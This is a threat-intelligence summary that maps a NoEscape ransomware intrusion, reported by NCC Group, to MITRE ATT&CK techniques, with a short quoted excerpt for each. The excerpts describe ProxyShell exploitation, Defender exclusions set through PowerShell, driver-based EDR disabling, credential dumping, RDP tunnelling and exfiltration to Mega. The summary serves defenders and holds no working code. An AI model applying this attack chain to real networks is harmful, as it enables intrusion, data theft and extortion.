Is this the real life? Is this just fantasy? Caught in a landslide, NoEscape from NCC Group

MITRE Techniques

• [T1190] Exploit Public-Facing Application – Initial access gained by exploiting ProxyShell vulnerabilities. “The vulnerabilities CVE-2021-34473, CVE-2021-34523 and CVE-2021-31207 which are more commonly known as ProxyShell were exploited.”
• [T1059.001] Command and Scripting Interpreter: PowerShell – PowerShell used to add an exclusion path to the anti-virus. “PowerShell was utilised by the threat actor, using the Defender command Set-MpPreference to exclude specific paths from being monitored.”
• [T1059.003] Command and Scripting Interpreter: Windows Command Shell – Native Windows commands used during discovery. “Windows native commands were executed during the discovery phase; targeting domain admin users, antivirus products installed etc.”
• [T1053.005] Scheduled Task – A Scheduled Task named SystemUpdate was used to execute the ransomware. “As has been well documented [2], a Scheduled Task with the name SystemUpdate was used to execute the ransomware.”
• [T1505.003] Server Software Component: Web Shell – Web shells provided continued access through the initial access vector. “Web Shells provided the threat actor continued access to the estate through the initial access vector.”
• [T1078.002] Valid Accounts: Domain Accounts – Credentials for domain accounts used for lateral movement and execution. “Threat actor gained credentials for valid domain accounts which were used for the majority of lateral movement and execution”
• [T1078.003] Valid Accounts: Local Accounts – Enabled DefaultAccount to execute tools locally. “The threat actor was observed enabling the DefaultAccount and utilising this to execute their tools locally on a host.”
• [T1562.001] Impair Defences: Disable or Modify Tools – Dropped multiple drivers to disable EDR/AV; “throw the kitchen sink at it” approach. “multiple different drivers were dropped in an attempt to disable the deployed EDR and AV. Instead of deploying a single driver, multiple drivers and tools were dropped in a ‘throw the kitchen sink at it’ approach.”
• [T1003] Credential Dumping – Multiple credential dumping tools deployed to obtain credentials. “Similar to the above, multiple credential dumping tools were dropped by the threat actor in an attempt to obtain legitimate credentials.”
• [T1087.001] Account Discovery: Local Account – Use of built-in Windows commands to identify local admins. “A number of inbuilt Windows commands were used to gain an understanding of the local administrators on the group:”
• [T1018] Remote System Discovery – Discovery of network details (e.g., PDC) using netdom. “netdom query /d:REDACTED PDC”
• [T1021.001] Remote Desktop Protocol – Lateral movement via RDP using dumped credentials. “The primary method of lateral movement was RDP”
• [T1572] Protocol Tunnelling – PuTTY/Plink SSH tunneling to present RDP access. “PuTTY link onto multiple hosts… SSH tunnel was created to present RDP access…”
• [T1219] Remote Access Software – Use of TeamViewer to maintain access. “obtaining credentials to the TeamViewer deployment”
• [T1048.002] Exfiltration Over Alternative Protocol: Exfiltration Over Asymmetric Encrypted Non-C2 Protocol – Data exfiltration to Mega cloud storage. “MegaSync was utilised to exfiltrate data to the cloud storage solution Mega”
• [T1486] Data Encrypted for Impact – Encryptor encrypted most files on C: drive. “The encryptor targeted all files on the C: drive except those with the below extension”